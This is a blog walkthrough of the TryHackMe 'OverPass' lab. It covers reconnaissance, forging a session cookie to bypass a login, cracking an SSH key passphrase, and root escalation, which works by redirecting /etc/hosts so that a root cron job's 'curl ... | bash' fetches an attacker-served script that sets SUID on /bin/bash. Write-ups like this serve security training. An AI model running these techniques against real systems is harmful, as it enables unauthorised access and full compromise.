TryHackMe: OverPass

TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.

I boot up my AttackBox and machine, the machine in question is 10.10.224.184.

First, I do a preliminary nmap scan:

root@ip-x-x-x-x:~# nmap -sV 10.10.224.184
 Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST
 Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184)
 Host is up (0.0011s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 MAC Address: 02:D2:A2:85:F6:47 (Unknown)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds

We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:

root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://10.10.224.184
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
 2021/07/09 15:55:52 Starting gobuster
 /aboutus (Status: 301)
 /admin (Status: 301)
 /css (Status: 301)
 /downloads (Status: 301)
 /img (Status: 301)
 /index.html (Status: 301)
 2021/07/09 15:55:53 Finished

The admin directory is of interest. Let’s check that out!

Simple Admin Login Page

We are greeted with an admin login page. I checked the source code to see if there was any comments left in the code but did not see anything. One interesting file with this webpage is the login.js file. It shows us that the form submits to /api/login and then will return statusOrCookie that will be either "Incorrect credentials" or it will a token that is set using Cookies.set("SessionToken",statusOrCookie). This looks like a promissing attack vector.

Another possible route may be SQL injection. I am going to test a common set of passwords like admin:password123 and see if that gives us anything, then try some SQL injection. If all else fails, I want to check to see if we can just set our own SessionToken and grant ourselves access.

SQL Injection did not work, but setting the SessionToken cookie and refreshing so it sends over the headers did work! It provides us with an SSH private key for ‘James’. Also mentions it is crackable. First I am just going to copy the contents and see if we can login with the key alone.

I copied the key to ~/.ssh/id_rsa and did a chmod 400 ~/.ssh/id_rsa to set permissions to read only by us, and finally ssh -i ~/.ssh/id_rsa 10.10.224.184 to attempt to login.

And crud:

Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py – which I don’t know where it is so find + grep will help me out:

root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py"
 /opt/john/ssh2john.py

Now we just use python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash to get the hash file.

Next I did a locate rockyou to find the word list and we can use the hash file with a wordlist to crack the passphrase:

root@ip-x-x-x-x:~# john id_rsa.hash /usr/share/wordlists/rockyou.txt --format=SSH


Within a few seconds we get the passphrase! Now let’s ssh back in to james’ account.

ssh -i ~/.ssh/id_rsa [email protected]

And we can cat user.txt for the first flag!

Now we need to privesc to get root permissions.

First, I try running sudo -l to see what commands we can run as sudo, however it immediately asks us for a password that we do not know.

I am going to grab a copy of LinEnum.sh and get it on the machine to run and see what all we have to work with:

# First, we need to get the file on our attack machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Next, start a web server in the dir to transfer the file
python -m "http.server" 3333
# Now, on the target machine, grab the file
wget https://attack-machine-ip:3333/LinEnum.sh
# Set executable
chmod +x LinEnum.sh
# Save the results out
./LinEnum.sh > results.txt
# and lets parse through them
cat results.txt | more

I’m parsing through the results and these items stand out:

  • Two admin users of syslog and tryhackme
  • Super user account root
  • Home directory of tryhackme is set to only allow that user to read from it (vs our home directory is readable by all)
  • The crontab executes a curl overpass.thm/downloads/src/buildscript.sh | bash as root every minute
    • This is our way in. I ran a cat /etc/hosts and see that overpass.thm just points back to localhost, which means the file is here on the machine.
    • It seems like the files might be in the /root or /tryhackme folders. So we cannot get to those yet.

I went back a little and checked the perms of the hosts file with ls -la /etc/hosts and it shows that everyone is able to read and write to hosts!! So we can create a file on our machine in the directory /downloads/src/buildscript.sh and have it do what we want. The easiest thing is to chmod +s /bin/bash so when we run it, we get root privileges.

So that’s exactly what I did! I started a python web server with python3 -m "http.server" 80 in a directory that had the folder structure of /downloads/src/buildscript.sh. Then I modified the /etc/hosts on the target machine to point overpass.thm to my attack machine’s IP. After a minute, I saw the call come in and it grabbed the file!

Now I just needed to call /bin/bash -p and ran whoami and it said root!

cat /root/root.txt gives us the final flag.

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *